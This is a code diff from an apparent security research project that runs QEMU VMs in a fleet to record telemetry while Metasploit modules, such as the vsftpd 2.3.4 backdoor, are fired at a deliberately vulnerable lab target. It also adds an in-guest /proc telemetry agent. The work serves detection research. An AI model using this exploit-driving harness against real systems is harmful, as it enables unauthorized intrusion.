+    logging.basicConfig(
+        level=getattr(logging, args.log_level.upper(), logging.INFO),
+        format="%(asctime)s %(levelname)s %(name)s %(message)s",
+    )
+
+    if args.capacity:
+        print(capacity_report())
+        return 0
+
+    manifest = SampleManifest.load(args.manifest)
+    repo_root = Path(__file__).resolve().parent.parent
+    modules_dir = Path(args.modules_dir)
+    modules = load_module_configs(modules_dir) if modules_dir.exists() else {}
+
+    cfg = FleetConfig(
+        host_id=args.host_id,
+        repo_root=repo_root,
+        data_root=Path(args.data_root).resolve(),
+        manifest=manifest,
+        modules=modules,
+        ram_per_vm_mib=args.ram_per_vm_mib,
+        max_concurrent_override=args.max_concurrent,
+        require_real_samples=args.require_real_samples,
+        force_tier2=args.force_tier2,
+    )
+
+    runner = FleetRunner(cfg)
+
+    def _stop(signum, frame):  # noqa: ARG001
+        runner.stop()
+    signal.signal(signal.SIGTERM, _stop)
+    signal.signal(signal.SIGINT, _stop)
+
+    result = runner.run(episodes=args.waves)
+
+    print(json.dumps({
+        "host_id": args.host_id,
+        "capacity": result.capacity.to_dict(),
+        "modules_loaded": sorted(modules.keys()),
+        "slots": [
+            {
+                "slot": s.slot,
+                "sample": s.sample_name,
+                "sample_kind": s.sample_kind,
+                "tier": s.tier,
+                "module": s.module_name,
+                "rc": s.rc,
+                "duration_s": s.duration_s,
+                "error": s.error,
+            } for s in result.slots
+        ],
+        "total_duration_s": result.total_duration_s,
+    }, indent=2))
+
+    return 0 if all(s.rc == 0 for s in result.slots) else 1
+
+
+if __name__ == "__main__":
+    sys.exit(main())
--- a/tools/run_real_vm_demo.py
+++ b/tools/run_real_vm_demo.py
@ -27,7 +27,9 @@ from pathlib import Path
 sys.path.insert(0, str(Path(__file__).resolve().parent.parent))
 sys.path.insert(0, str(Path(__file__).resolve().parent))

+from collectors import qmp  # noqa: E402
 from orchestrator.episode import EpisodeConfig, EpisodeRunner  # noqa: E402
+from samples.manifest import SampleManifest  # noqa: E402
 from vm_load_controller import VMLoadController  # noqa: E402
 from vm_serial import SerialClient  # noqa: E402

@ -69,7 +71,17 @@ def main() -> int:
    parser.add_argument("--interval-ms", type=int, default=100)
    parser.add_argument(
        "--run-dir",
-        default="/tmp/cis490-vm",
+        # Per-slot defaults so the fleet runner's parallel calls don't
+        # collide on the same /tmp dir (which would have rmtree'd each
+        # other's pidfiles mid-boot — see CIS490 history). Resolution
+        # order:
+        #   1) explicit --run-dir CLI flag
+        #   2) RUN_DIR env (set by the fleet runner)
+        #   3) /tmp/cis490-vm-<SLOT>  (SLOT defaults to 0)
+        default=(
+            os.environ.get("RUN_DIR")
+            or f"/tmp/cis490-vm-{os.environ.get('SLOT', '0')}"
+        ),
        help="QEMU run dir (sockets + pidfile go here)",
    )
    parser.add_argument(
@ -83,6 +95,16 @@ def main() -> int:
        default=120.0,
        help="how long to wait for serial login prompt",
    )
+    parser.add_argument(
+        "--sample",
+        default=os.environ.get("SAMPLE_NAME"),
+        help="Pick a workload profile from the manifest by name. Fleet runner "
+        "passes this via SAMPLE_NAME env. If unset, runs the v1 yes-loop.",
+    )
+    parser.add_argument(
+        "--manifest",
+        default=str(Path(__file__).resolve().parent.parent / "samples" / "manifest.toml"),
+    )
    args = parser.parse_args()

    logging.basicConfig(
@ -93,6 +115,17 @@ def main() -> int:

    repo_root = Path(__file__).resolve().parent.parent
    launcher = repo_root / "vm" / "launch_demo.sh"
+
+    # Resolve sample if requested.
+    sample = None
+    if args.sample:
+        manifest = SampleManifest.load(args.manifest)
+        sample = next((s for s in manifest.samples if s.name == args.sample), None)
+        if sample is None:
+            log.error("sample %r not in manifest %s", args.sample, args.manifest)
+            return 2
+        log.info("using sample=%s profile=%s kind=%s",
+                 sample.name, sample.profile, sample.kind)
    run_dir = Path(args.run_dir)
    # Wipe any stale sockets/pidfile from a previous run.
    if run_dir.exists():
@ -137,9 +170,42 @@ def main() -> int:
        serial.connect()
        serial.login(boot_timeout_s=args.boot_timeout)

-        controller = VMLoadController(serial)
+        # Take a savevm AFTER the guest is fully up but BEFORE we
+        # start any workload. EpisodeConfig.revert_at_{start,end} use
+        # this snapshot for inter-episode reverts (the snapshot lives
+        # in the qcow2's per-VM-process overlay since launch_demo.sh
+        # runs with snapshot=on, so it's discarded with the VM).
+        # Without this step, loadvm would target a snapshot that
+        # doesn't exist and silently emit snapshot_revert_failed.
+        qmp_sock = run_dir / "qmp.sock"
+        if qmp_sock.exists():
+            try:
+                _qmp = qmp.QMPClient(qmp_sock)
+                _qmp.connect()
+                try:
+                    out = _qmp.savevm("baseline-v1")
+                    log.info("savevm baseline-v1 OK: %s", out.strip()[:160])
+                finally:
+                    _qmp.close()
+            except Exception as e:
+                log.warning("savevm failed; revert_at_start unusable: %s", e)
+
+        # Bind the controller to the runner's event log so workload
+        # success/failure shows up alongside phase_transition events.
+        # Sample also goes into EpisodeConfig below so meta.sample
+        # records what was supposed to run.
+        runner_for_emit = {"runner": None}
+        controller = VMLoadController(
+            serial,
+            sample=sample,
+            emit_event=lambda ev, **kw: (
+                runner_for_emit["runner"].emit_event(ev, **kw)
+                if runner_for_emit["runner"] else None
+            ),
+        )
        controller.setup()

+        agent_sock = run_dir / "agent.sock"
        cfg = EpisodeConfig(
            target_pid=qemu_pid,
            duration_s=sum(d for _, d in DEFAULT_SCHEDULE),
@ -148,9 +214,18 @@ def main() -> int:
            phase_schedule=DEFAULT_SCHEDULE,
            image_name="alpine-3.21-cloudinit",
            snapshot_name="baseline-v1",
+            qmp_socket=qmp_sock if qmp_sock.exists() else None,
+            guest_agent_socket=agent_sock if agent_sock.exists() else None,
+            bridge_iface=os.environ.get("BRIDGE") or None,
+            sample=sample,
        )

-        result = EpisodeRunner(cfg, on_phase=controller.set_phase).run()
+        runner = EpisodeRunner(cfg, on_phase=controller.set_phase)
+        # Connect the controller's event sink to the runner now that
+        # both exist. (Forward-reference closure pattern keeps the
+        # constructor argument order natural.)
+        runner_for_emit["runner"] = runner
+        result = runner.run()

        controller.teardown()
        serial.close()
--- a/tools/run_tier3_demo.py
+++ b/tools/run_tier3_demo.py
@ -0,0 +1,300 @@
+"""Tier-3: real VM, real exploit, honest ``armed -> infecting`` transition.
+
+Boots the vulnerable target VM, drives an msfrpcd-fired exploit module
+against it, and lets the orchestrator's host /proc collector sample
+the qemu-system pid throughout. Compared to ``run_real_vm_demo.py``:
+the workload that crosses the ``armed -> infecting`` boundary is now
+generated by an actual exploit landing a session, not by a script in
+the guest.
+
+Prereqs:
+  - vm/images/<target>.qcow2 (e.g. Metasploitable2)
+  - msfrpcd running locally:
+        msfrpcd -P <password> -U msf -a 127.0.0.1 -p 55553
+  - ``msgpack`` python package installed (added to runtime deps)
+
+Run:
+    MSFRPC_PASSWORD=<pass> uv run python tools/run_tier3_demo.py \\
+        --module vsftpd_234_backdoor \\
+        --data-root data
+"""
+
+from __future__ import annotations
+
+import argparse
+import logging
+import os
+import signal
+import subprocess
+import sys
+import time
+from pathlib import Path
+
+# Allow running as a script.
+sys.path.insert(0, str(Path(__file__).resolve().parent.parent))
+
+from collectors import qmp  # noqa: E402
+from exploits.driver import DriverConfig, MSFExploitDriver  # noqa: E402
+from exploits.modules import load_module_config  # noqa: E402
+from exploits.msfrpc import MSFRpcClient, MSFRpcConfig  # noqa: E402
+from orchestrator.episode import EpisodeConfig, EpisodeRunner  # noqa: E402
+from samples.manifest import SampleManifest  # noqa: E402
+
+
+# Same envelope shape as Tier 2 so plots are comparable. Slightly more
+# armed/infecting time because real exploit fire + session establishment
+# takes hundreds of ms to a few seconds.
+DEFAULT_SCHEDULE = [
+    ("clean",            10.0),
+    ("armed",             3.0),
+    ("infecting",         5.0),
+    ("infected_running", 25.0),
+    ("dormant",          15.0),
+    ("infected_running", 20.0),
+    ("dormant",           5.0),
+    ("clean",             5.0),
+]
+
+
+def _wait_for_path(path: Path, timeout_s: float) -> None:
+    deadline = time.monotonic() + timeout_s
+    while time.monotonic() < deadline:
+        if path.exists() and path.read_text().strip():
+            return
+        time.sleep(0.2)
+    raise TimeoutError(f"{path} never appeared within {timeout_s}s")
+
+
+def _wait_for_tcp(host: str, port: int, timeout_s: float) -> None:
+    import socket
+    deadline = time.monotonic() + timeout_s
+    last_err: Exception | None = None
+    while time.monotonic() < deadline:
+        try:
+            with socket.create_connection((host, port), timeout=1.0):
+                return
+        except OSError as e:
+            last_err = e
+            time.sleep(1.0)
+    raise TimeoutError(
+        f"target service {host}:{port} not reachable within {timeout_s}s "
+        f"(last: {last_err})"
+    )
+
+
+def main() -> int:
+    parser = argparse.ArgumentParser(prog="run_tier3_demo")
+    parser.add_argument("--data-root", default="data")
+    parser.add_argument("--interval-ms", type=int, default=100)
+    parser.add_argument(
+        "--module",
+        default="vsftpd_234_backdoor",
+        help="Module config name in exploits/modules/<name>.toml",
+    )
+    parser.add_argument(
+        "--target-ip",
+        default="127.0.0.1",
+        help="Address the exploit module sets RHOSTS to. With the SLIRP "
+        "launcher (default), the guest's vulnerable port is hostfwd'd to "
+        "loopback; on a host-only bridge, this is the guest's bridge IP.",
+    )
+    parser.add_argument(
+        "--target-port",
+        type=int,
+        default=21,
+        help="Probe port to wait on before firing the exploit",
+    )
+    parser.add_argument(
+        "--run-dir",
+        # Per-slot defaults so the fleet runner's parallel calls don't
+        # collide on the same /tmp dir. See run_real_vm_demo.py for
+        # the same fix.
+        default=(
+            os.environ.get("RUN_DIR")
+            or f"/tmp/cis490-target-{os.environ.get('SLOT', '0')}"
+        ),
+        help="QEMU run dir (sockets + pidfile)",
+    )
+    parser.add_argument(
+        "--msfrpc-host", default=os.environ.get("MSFRPC_HOST", "127.0.0.1"),
+    )
+    parser.add_argument(
+        "--msfrpc-port", type=int,
+        default=int(os.environ.get("MSFRPC_PORT", "55553")),
+    )
+    parser.add_argument(
+        "--msfrpc-user", default=os.environ.get("MSFRPC_USER", "msf"),
+    )
+    parser.add_argument(
+        "--keep-vm",
+        action="store_true",
+        help="leave the VM running after the episode finishes",
+    )
+    parser.add_argument(
+        "--target-boot-timeout",
+        type=float,
+        default=180.0,
+        help="how long to wait for the guest's vulnerable service to listen",
+    )
+    parser.add_argument(
+        "--sample",
+        default=os.environ.get("SAMPLE_NAME"),
+        help="Pick a workload profile from the manifest by name. Fleet runner "
+        "passes this via SAMPLE_NAME env. Without it, falls back to the v1 yes-loop.",
+    )
+    parser.add_argument(
+        "--manifest",
+        default=str(Path(__file__).resolve().parent.parent / "samples" / "manifest.toml"),
+    )
+    args = parser.parse_args()
+
+    logging.basicConfig(
+        level=logging.INFO,
+        format="%(asctime)s %(levelname)s %(name)s %(message)s",
+    )
+    log = logging.getLogger("cis490.run_tier3_demo")
+
+    msfrpc_password = os.environ.get("MSFRPC_PASSWORD")
+    if not msfrpc_password:
+        log.error("MSFRPC_PASSWORD env var must be set")
+        return 2
+
+    repo_root = Path(__file__).resolve().parent.parent
+    launcher = repo_root / "vm" / "launch_target.sh"
+    modules_dir = repo_root / "exploits" / "modules"
+    module_path = modules_dir / f"{args.module}.toml"
+    if not module_path.exists():
+        log.error("no module config at %s", module_path)
+        return 2
+
+    module = load_module_config(module_path)
+    log.info("module loaded: %s (%s)", module.name, module.module_path)
+
+    sample = None
+    if args.sample:
+        manifest = SampleManifest.load(args.manifest)
+        sample = next((s for s in manifest.samples if s.name == args.sample), None)
+        if sample is None:
+            log.error("sample %r not in manifest %s", args.sample, args.manifest)
+            return 2
+        log.info("sample=%s profile=%s kind=%s",
+                 sample.name, sample.profile, sample.kind)
+
+    run_dir = Path(args.run_dir)
+    if run_dir.exists():
+        import shutil
+        shutil.rmtree(run_dir)
+    run_dir.mkdir(parents=True, exist_ok=True)
+    pid_file = run_dir / "qemu.pid"
+
+    log.info("booting target VM via %s (RUN_DIR=%s)", launcher, run_dir)
+    env = os.environ.copy()
+    env["RUN_DIR"] = str(run_dir)
+    qemu = subprocess.Popen(
+        [str(launcher)],
+        cwd=str(repo_root),
+        env=env,
+        stdout=subprocess.DEVNULL,
+        stderr=subprocess.DEVNULL,
+        start_new_session=True,
+    )
+
+    try:
+        _wait_for_path(pid_file, timeout_s=15.0)
+        qemu_pid = int(pid_file.read_text().strip())
+        log.info("qemu pid = %d; waiting for service on %s:%d (timeout %.0fs)",
+                 qemu_pid, args.target_ip, args.target_port,
+                 args.target_boot_timeout)
+        _wait_for_tcp(args.target_ip, args.target_port, args.target_boot_timeout)
+        log.info("target service is up")
+
+        # Pre-exploit savevm so EpisodeConfig.revert_at_{start,end}
+        # has a known-good baseline to load. Best-effort — we still
+        # run the episode if savevm fails (just without revert
+        # support). See run_real_vm_demo.py for the same pattern.
+        qmp_sock = run_dir / "qmp.sock"
+        if qmp_sock.exists():
+            try:
+                _qmp = qmp.QMPClient(qmp_sock)
+                _qmp.connect()
+                try:
+                    out = _qmp.savevm("baseline-v1")
+                    log.info("savevm baseline-v1 OK: %s", out.strip()[:160])
+                finally:
+                    _qmp.close()
+            except Exception as e:
+                log.warning("savevm failed; revert_at_start unusable: %s", e)
+
+        client = MSFRpcClient(
+            MSFRpcConfig(
+                host=args.msfrpc_host,
+                port=args.msfrpc_port,
+                user=args.msfrpc_user,
+                password=msfrpc_password,
+            )
+        )
+
+        cfg = EpisodeConfig(
+            target_pid=qemu_pid,
+            duration_s=sum(d for _, d in DEFAULT_SCHEDULE),
+            interval_ms=args.interval_ms,
+            data_root=Path(args.data_root),
+            phase_schedule=DEFAULT_SCHEDULE,
+            image_name=module.name + "-target",
+            snapshot_name="baseline-v1",
+            sample=sample,
+            exploit_meta={
+                "framework": "metasploit",
+                "module": module.module_path,
+                "module_type": module.module_type,
+                "module_name": module.name,
+                "payload": module.payload_path,
+                "rport": module.options.get("RPORT"),
+                "rhost_template": module.options.get("RHOSTS"),
+            },
+        )
+        runner = EpisodeRunner(cfg)
+
+        driver = MSFExploitDriver(
+            client=client,
+            module=module,
+            cfg=DriverConfig(
+                target_ip=args.target_ip,
+                sample_store_root=repo_root / "samples" / "store",
+            ),
+            emit_event=runner.emit_event,
+            sample=sample,
+        )
+        runner.on_phase = driver.set_phase
+
+        driver.setup()
+        try:
+            result = runner.run()
+        finally:
+            driver.teardown()
+
+        print()
+        print(f"episode_id = {result.episode_id}")
+        print(f"path       = {result.episode_dir}")
+        print(f"rows_proc  = {result.rows_proc}")
+        print(f"phases     = {result.phases_observed}")
+        print(f"module     = {module.module_path}")
+        print()
+        print("To plot:")
+        print(f"  uv run python tools/plot_envelope.py {result.episode_dir}")
+        return 0
+    finally:
+        if not args.keep_vm:
+            log.info("shutting down VM (pid=%d)", qemu.pid)
+            try:
+                os.killpg(os.getpgid(qemu.pid), signal.SIGTERM)
+            except ProcessLookupError:
+                pass
+            try:
+                qemu.wait(timeout=5)
+            except subprocess.TimeoutExpired:
+                os.killpg(os.getpgid(qemu.pid), signal.SIGKILL)
+
+
+if __name__ == "__main__":
+    sys.exit(main())
--- a/tools/vm_load_controller.py
+++ b/tools/vm_load_controller.py
@ -22,21 +22,63 @@ fire and a real sample.
 from __future__ import annotations

 import logging
+import sys
+from pathlib import Path
+from typing import Callable

 from vm_serial import SerialClient

+# Allow running as a script (sibling of tools/).
+sys.path.insert(0, str(Path(__file__).resolve().parent.parent))
+
+from exploits.workloads import Workload, workload_for  # noqa: E402
+from samples.manifest import Sample  # noqa: E402
+

 log = logging.getLogger("cis490.vm_load_controller")


+EmitEvent = Callable[..., None]
+
+
 class VMLoadController:
-    def __init__(self, serial: SerialClient) -> None:
+    """Drives a real Alpine guest through the phase schedule for
+    Tier 2 (no exploit). Workload is chosen by ``sample.profile`` —
+    same profile catalog as the Tier-3 driver so a fleet wave
+    produces matched envelopes whether or not an exploit fires.
+
+    Without a sample, falls back to the original cpu-saturate yes-loop
+    (the original Tier-2 demo behaviour).
+
+    Every set_phase call emits an event into the runner's events.jsonl
+    so we can audit (a) whether the workload command actually got
+    sent, (b) whether the guest acknowledged it, and (c) whether the
+    expected process is running afterwards. Without those events,
+    silent failures (login partial, command swallowed by tty) produce
+    well-labeled but information-less episodes — see CIS490 history
+    where every phase median'd 20% CPU on elliott-lab."""
+
+    def __init__(
+        self,
+        serial: SerialClient,
+        sample: Sample | None = None,
+        emit_event: EmitEvent | None = None,
+    ) -> None:
        self.s = serial
+        self.sample = sample
+        self.workload: Workload | None = workload_for(sample)
+        # No-op default so callers don't have to thread an emitter.
+        self.emit: EmitEvent = emit_event or (lambda *a, **kw: None)

    def setup(self) -> None:
        # Kill any pre-existing load and clear scratch space.
        self._kill_load()
        self.s.run("rm -f /tmp/payload /tmp/armed.log; echo setup-ok")
+        self.emit(
+            "workload_setup",
+            profile=self.workload.profile if self.workload else "v1-yes",
+            sample=self.sample.name if self.sample else None,
+        )

    def teardown(self) -> None:
        self._kill_load()
@ -44,29 +86,86 @@ class VMLoadController:
    # ---- phases ---------------------------------------------------------

    def set_phase(self, phase: str) -> None:
-        log.info("vm phase -> %s", phase)
-        if phase == "clean":
-            self._kill_load()
-        elif phase == "armed":
-            self.s.run("echo armed-handshake-$(date +%s) > /tmp/armed.log")
-        elif phase == "infecting":
-            self.s.run(
-                "dd if=/dev/urandom of=/tmp/payload bs=4k count=128 2>/dev/null && "
-                "chmod +x /tmp/payload"
+        log.info("vm phase -> %s (profile=%s)",
+                 phase, self.workload.profile if self.workload else "v1")
+        try:
+            if phase == "clean":
+                self._kill_load()
+                self._emit_phase("workload_killed", phase)
+            elif phase == "armed":
+                self.s.run("echo armed-handshake-$(date +%s) > /tmp/armed.log")
+                self._emit_phase("workload_armed", phase)
+            elif phase == "infecting":
+                self.s.run(
+                    "dd if=/dev/urandom of=/tmp/payload bs=4k count=128 2>/dev/null && "
+                    "chmod +x /tmp/payload"
+                )
+                self._emit_phase("workload_infecting", phase)
+            elif phase == "infected_running":
+                self._kill_load()
+                if self.workload is not None:
+                    self.s.run(self.workload.start_cmd)
+                else:
+                    self.s.run(
+                        "nohup sh -c 'yes > /dev/null' </dev/null >/dev/null 2>&1 & disown"
+                    )
+                self._emit_phase("workload_started", phase)
+            elif phase == "dormant":
+                # Probe BEFORE we kill so we see whether the workload
+                # was actually running. If the probe says nothing was
+                # running, the previous infected_running was a no-op
+                # and the trainer should filter this episode.
+                probe = self._probe()
+                self._kill_load()
+                self._emit_phase("workload_killed", phase, pre_kill_probe=probe)
+            else:
+                log.warning("unknown phase: %s", phase)
+        except Exception as e:
+            # Don't propagate — the runner already swallows on_phase
+            # exceptions. But DO record so the episode is filterable.
+            log.exception("set_phase(%s) failed", phase)
+            self.emit(
+                "workload_failed",
+                phase=phase,
+                error=str(e)[:200],
+                profile=self.workload.profile if self.workload else "v1-yes",
            )
-        elif phase == "infected_running":
-            self._kill_load()
-            # Background CPU burner. `nohup` + `&` + redirects to detach.
-            self.s.run(
-                "nohup sh -c 'yes > /dev/null' </dev/null >/dev/null 2>&1 & disown"
-            )
-        elif phase == "dormant":
-            self._kill_load()
-        else:
-            log.warning("unknown phase: %s", phase)

    # ---- internals ------------------------------------------------------

    def _kill_load(self) -> None:
-        # `true` at the end so the run() exit status is always 0.
+        if self.workload is not None:
+            self.s.run(self.workload.stop_cmd)
+        # Always sweep the v1 leftover commands too, in case we just
+        # switched profiles mid-fleet-run.
        self.s.run("pkill yes 2>/dev/null; pkill stress-ng 2>/dev/null; true")
+
+    def _probe(self) -> dict:
+        """Ask the guest what's actually running. Returns a small dict
+        the caller stamps into the event so trainers can detect the
+        "workload didn't fire" case from meta alone."""
+        try:
+            out = self.s.run(
+                "echo yes=$(pgrep -c yes 2>/dev/null || echo 0); "
+                "echo sh=$(pgrep -c sh 2>/dev/null || echo 0); "
+                "echo loadavg=$(awk '{print $1}' /proc/loadavg)"
+            )
+            stats: dict = {}
+            for line in out.splitlines():
+                line = line.strip()
+                if "=" not in line:
+                    continue
+                k, _, v = line.partition("=")
+                stats[k.strip()] = v.strip()
+            return stats
+        except Exception as e:
+            return {"probe_error": str(e)[:120]}
+
+    def _emit_phase(self, event: str, phase: str, **extra) -> None:
+        self.emit(
+            event,
+            phase=phase,
+            profile=self.workload.profile if self.workload else "v1-yes",
+            sample=self.sample.name if self.sample else None,
+            **extra,
+        )
--- a/vm/guest-agent/cis490_agent.py
+++ b/vm/guest-agent/cis490_agent.py
@ -0,0 +1,274 @@
+#!/usr/bin/env python3
+"""In-guest telemetry agent — runs INSIDE the VM.
+
+Writes one JSON-lines row per tick to a virtio-serial port that the
+host has wired up as ``cis490.guest.agent``. The host-side collector
+(`collectors.guest_agent`) reads these rows and stamps them with the
+host's monotonic clock before persisting to ``telemetry-guest.jsonl``.
+
+Stdlib only — no `psutil`, no extra deps to bake into the guest. Every
+field is read from /proc on the guest, so this works on busybox-based
+Alpine, on Cirros, and on Metasploitable2 unchanged.
+
+Wire path inside the guest:
+    /dev/virtio-ports/cis490.guest.agent
+
+The host side opens the matching unix socket on the hypervisor.
+The protocol is intentionally trivial: the agent emits newline-
+delimited JSON; the host emits nothing back. One direction.
+
+This source is the **deployable** side — every row is tagged
+``available_in_deployment: true``. See docs/threat-model.md.
+"""
+
+from __future__ import annotations
+
+import argparse
+import json
+import os
+import platform
+import sys
+import time
+from typing import Any
+
+
+SOURCE = "guest_agent"
+AVAILABLE_IN_DEPLOYMENT = True
+DEFAULT_PORT = "/dev/virtio-ports/cis490.guest.agent"
+DEFAULT_INTERVAL_MS = 100  # 10 Hz
+DEFAULT_TOP_N = 8
+
+
+# ---------- /proc parsers ---------------------------------------------------
+
+
+def _read(path: str) -> str | None:
+    try:
+        with open(path, "rb") as f:
+            return f.read().decode("ascii", errors="replace")
+    except (FileNotFoundError, PermissionError):
+        return None
+
+
+def read_loadavg() -> tuple[float, float, float] | None:
+    text = _read("/proc/loadavg")
+    if text is None:
+        return None
+    parts = text.split()
+    return float(parts[0]), float(parts[1]), float(parts[2])
+
+
+def read_meminfo() -> dict[str, int]:
+    text = _read("/proc/meminfo")
+    out: dict[str, int] = {}
+    if text is None:
+        return out
+    for line in text.splitlines():
+        k, _, rest = line.partition(":")
+        v = rest.strip()
+        if v.endswith(" kB"):
+            try:
+                out[k] = int(v[:-3]) * 1024
+            except ValueError:
+                pass
+    return out
+
+
+def read_cpu_total() -> dict[str, int] | None:
+    """First line of /proc/stat: aggregate cpu user/nice/sys/idle/...
+    in jiffies since boot."""
+    text = _read("/proc/stat")
+    if text is None:
+        return None
+    line = text.splitlines()[0]
+    fields = line.split()
+    # cpu user nice system idle iowait irq softirq steal guest guest_nice
+    if not fields or fields[0] != "cpu":
+        return None
+    nums = [int(x) for x in fields[1:]]
+    pad = nums + [0] * max(0, 10 - len(nums))
+    return {
+        "user":      pad[0],
+        "nice":      pad[1],
+        "system":    pad[2],
+        "idle":      pad[3],
+        "iowait":    pad[4],
+        "irq":       pad[5],
+        "softirq":   pad[6],
+        "steal":     pad[7],
+        "guest":     pad[8],
+        "guest_nice":pad[9],
+    }
+
+
+def read_thermal_milli_c() -> int | None:
+    """Best-effort: /sys/class/thermal/thermal_zone0/temp."""
+    text = _read("/sys/class/thermal/thermal_zone0/temp")
+    if text is None:
+        return None
+    try:
+        return int(text.strip())
+    except ValueError:
+        return None
+
+
+def read_net_devs() -> dict[str, dict[str, int]]:
+    """Parse /proc/net/dev → {iface: {rx_bytes, tx_bytes, rx_pkts, tx_pkts}}."""
+    text = _read("/proc/net/dev")
+    out: dict[str, dict[str, int]] = {}
+    if text is None:
+        return out
+    lines = text.splitlines()
+    for line in lines[2:]:
+        if ":" not in line:
+            continue
+        name, _, rest = line.partition(":")
+        name = name.strip()
+        if name == "lo":
+            continue
+        cols = rest.split()
+        if len(cols) < 16:
+            continue
+        out[name] = {
+            "rx_bytes": int(cols[0]),
+            "rx_pkts":  int(cols[1]),
+            "tx_bytes": int(cols[8]),
+            "tx_pkts":  int(cols[9]),
+        }
+    return out
+
+
+def read_listen_ports() -> list[int]:
+    """TCP listen sockets from /proc/net/tcp + tcp6. State 0A = LISTEN."""
+    out: set[int] = set()
+    for path in ("/proc/net/tcp", "/proc/net/tcp6"):
+        text = _read(path)
+        if not text:
+            continue
+        for line in text.splitlines()[1:]:
+            cols = line.split()
+            if len(cols) < 4:
+                continue
+            if cols[3] != "0A":
+                continue
+            local = cols[1]  # "ADDR:PORT" with PORT in hex
+            _, _, port_hex = local.rpartition(":")
+            try:
+                out.add(int(port_hex, 16))
+            except ValueError:
+                pass
+    return sorted(out)
+
+
+def read_top_procs(top_n: int) -> list[dict[str, Any]]:
+    """Top-N processes by RSS. Cheap O(N) scan of /proc."""
+    procs: list[dict[str, Any]] = []
+    try:
+        entries = os.listdir("/proc")
+    except OSError:
+        return procs
+    for ent in entries:
+        if not ent.isdigit():
+            continue
+        pid = int(ent)
+        stat = _read(f"/proc/{pid}/stat")
+        if stat is None:
+            continue
+        try:
+            rparen = stat.rindex(")")
+            comm = stat[stat.index("(") + 1 : rparen]
+            fields = stat[rparen + 2:].split()
+            utime = int(fields[11])
+            stime = int(fields[12])
+            rss_pages = int(fields[21])
+        except (ValueError, IndexError):
+            continue
+        procs.append({
+            "pid": pid,
+            "comm": comm[:32],
+            "cpu_jiffies": utime + stime,
+            "rss_bytes": rss_pages * os.sysconf("SC_PAGESIZE"),
+        })
+    procs.sort(key=lambda p: p["rss_bytes"], reverse=True)
+    return procs[:top_n]
+
+
+# ---------- one tick --------------------------------------------------------
+
+
+def collect_once(top_n: int = DEFAULT_TOP_N) -> dict[str, Any]:
+    mem = read_meminfo()
+    cpu = read_cpu_total()
+    load = read_loadavg()
+    return {
+        "t_guest_mono_ns": time.monotonic_ns(),
+        "t_guest_wall_ns": time.time_ns(),
+        "source": SOURCE,
+        "available_in_deployment": AVAILABLE_IN_DEPLOYMENT,
+        "kernel": platform.release(),
+        "cpu_total_jiffies": cpu,
+        "load_1m_5m_15m": list(load) if load else None,
+        "mem_total_bytes":     (mem.get("MemTotal") or 0),
+        "mem_available_bytes": (mem.get("MemAvailable") or 0),
+        "mem_buffers_bytes":   (mem.get("Buffers") or 0),
+        "mem_cached_bytes":    (mem.get("Cached") or 0),
+        "swap_used_bytes":     (mem.get("SwapTotal", 0) - mem.get("SwapFree", 0)),
+        "thermal_milli_c": read_thermal_milli_c(),
+        "net": read_net_devs(),
+        "listen_ports": read_listen_ports(),
+        "top_procs": read_top_procs(top_n),
+    }
+
+
+# ---------- main loop -------------------------------------------------------
+
+
+def main(argv: list[str] | None = None) -> int:
+    p = argparse.ArgumentParser(prog="cis490-guest-agent")
+    p.add_argument("--port", default=DEFAULT_PORT,
+                   help="virtio-serial port path inside the guest")
+    p.add_argument("--interval-ms", type=int, default=DEFAULT_INTERVAL_MS)
+    p.add_argument("--top-n", type=int, default=DEFAULT_TOP_N)
+    p.add_argument("--once", action="store_true",
+                   help="emit a single row and exit (for smoke tests)")
+    args = p.parse_args(argv)
+
+    if args.once:
+        sys.stdout.write(json.dumps(collect_once(args.top_n)) + "\n")
+        sys.stdout.flush()
+        return 0
+
+    # Open the virtio-serial port. If the host hasn't wired one up,
+    # fall back to stdout so the agent is testable on bare-metal too.
+    out_fp: Any
+    if os.path.exists(args.port):
+        out_fp = open(args.port, "wb", buffering=0)
+    else:
+        sys.stderr.write(f"[cis490-agent] {args.port} missing; writing to stdout\n")
+        out_fp = sys.stdout.buffer
+
+    interval_ns = args.interval_ms * 1_000_000
+    next_tick = time.monotonic_ns()
+    try:
+        while True:
+            row = collect_once(args.top_n)
+            out_fp.write((json.dumps(row) + "\n").encode("utf-8"))
+            try:
+                out_fp.flush()
+            except (AttributeError, OSError):
+                pass
+            next_tick += interval_ns
+            sleep_ns = next_tick - time.monotonic_ns()
+            if sleep_ns > 0:
+                time.sleep(sleep_ns / 1_000_000_000)
+            else:
+                next_tick = time.monotonic_ns()
+    except KeyboardInterrupt:
+        return 0
+    except (BrokenPipeError, OSError) as e:
+        sys.stderr.write(f"[cis490-agent] write failed: {e}\n")
+        return 1
+
+
+if __name__ == "__main__":
+    sys.exit(main())
--- a/vm/launch_demo.sh
+++ b/vm/launch_demo.sh
@ -16,7 +16,17 @@ set -euo pipefail
 REPO_ROOT="$(cd "$(dirname "$0")/.." && pwd)"
 IMAGE="${IMAGE:-$REPO_ROOT/vm/images/alpine-baseline.qcow2}"
 CIDATA="${CIDATA:-$REPO_ROOT/vm/images/cidata.iso}"
-RUN_DIR="${RUN_DIR:-/tmp/cis490-vm}"
+# SLOT lets the fleet runner spin up N concurrent VMs without socket /
+# port collisions. Default RUN_DIR + ssh hostfwd port keep single-VM
+# usage unchanged.
+SLOT="${SLOT:-0}"
+RUN_DIR="${RUN_DIR:-/tmp/cis490-vm-$SLOT}"
+SSH_PORT="${SSH_PORT:-$((2222 + SLOT))}"
+# When BRIDGE is set, attach a tap to the host-only bridge instead of
+# using SLIRP usermode networking. The tap must already exist and be a
+# member of the bridge — see vm/setup_bridge.sh + (operator) ip tuntap.
+BRIDGE="${BRIDGE:-}"
+TAP="${TAP:-cis490tap$SLOT}"

 mkdir -p "$RUN_DIR"
 QMP_SOCK="$RUN_DIR/qmp.sock"
@ -32,8 +42,14 @@ if [[ ! -f "$CIDATA" ]]; then
    exit 1
 fi

+AGENT_SOCK="$RUN_DIR/agent.sock"
+
 # snapshot=on routes guest writes through a temporary overlay so the qcow2
 # on disk is never mutated — every boot starts from the same bytes.
+#
+# Second virtio-serial port (cis490.guest.agent) carries telemetry
+# from the in-guest agent. Surfaces inside the guest at
+# /dev/virtio-ports/cis490.guest.agent and on the host at $AGENT_SOCK.
 exec qemu-system-x86_64 \
    -name cis490-vm \
    -machine q35,accel=kvm \
@ -42,8 +58,15 @@ exec qemu-system-x86_64 \
    -m 256 \
    -drive file="$IMAGE",format=qcow2,if=virtio,snapshot=on \
